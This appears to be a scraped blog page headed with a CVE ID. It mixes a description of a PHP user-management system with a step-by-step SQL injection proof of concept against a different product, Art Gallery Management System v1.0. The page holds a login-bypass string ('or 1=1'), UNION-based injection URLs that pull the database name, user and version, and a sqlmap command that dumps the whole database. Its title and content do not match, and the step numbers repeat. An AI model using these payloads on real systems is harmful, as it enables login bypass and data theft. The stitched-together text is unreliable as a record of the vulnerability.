CVE-2023-37771 Registration & Login User Management System

User Module

 

In user module, user can register yourself. After Registration user can log in with own email id and password.
if the user forgot their own password then user can request for password using their own email id.

User Registration
User Login
Forgot Password

or bypass login with sql injection ” or 1=1 limit 1 — -+”


Note: For Forgot password , you have provide your gmail credetails in password-recovery.php. After that email function will work on your localhost.

Art Gallery Management System v1.0 contains a SQL injection vulnerability via the cid parameter at /agms/product.php.

Configurations :

cpe:2.3:a:phpgurukul:art_gallery_management_system:1.0:*:*:*:*:*:*:*

Steps Of Reproduce – 

1. Go to the Sculptures by navigating the “ART TYPE” option in the navigation bar.

 http://127.0.0.1/agms/product.php?cid=1&&artname=Sculptures

 2. Here on this page in “cid” parameter by inserting single quotes to break the query we know that the “cid” parameter is vulnerable to SQL injection.

 http://127.0.0.1/agms/product.php?cid=1’&&artname=Sculptures

 3. Now join query

 http://127.0.0.1/agms/product.php?cid=1′–+&&artname=Sculptures

 3. Now run “order by ” query to know the columns

 127.0.0.1/agms/product.php?cid=1′ order by 6 –+&&artname=Sculptures

 4.Now By inserting the payload in the “cid” parameter we got the username, database, and database version.

 127.0.0.1/agms/product.php?cid=1′ union all select 1,2,3,database(),5,6 –+&&artname=Sculptures

 127.0.0.1/agms/product.php?cid=1′ union all select 1,2,3,current_user(),5,6 –+&&artname=Sculptures

 127.0.0.1/agms/product.php?cid=1′ union all select 1,2,3,version(),5,6 –+&&artname=Sculptures

 5. Now dump all the database by using sqlmap:

 sqlmap -u http://127.0.0.1/agms/product.php?cid=1 –dump-all –batch

Admin Panel

Admin can manage all registered users. Admin can update the user information and delete the user.
Admin can change own password
Admin Login
Manage users
Edit user information
Change Password(admin)

source by pandaantech.blogspot.com

 

Leave a Reply

Your email address will not be published. Required fields are marked *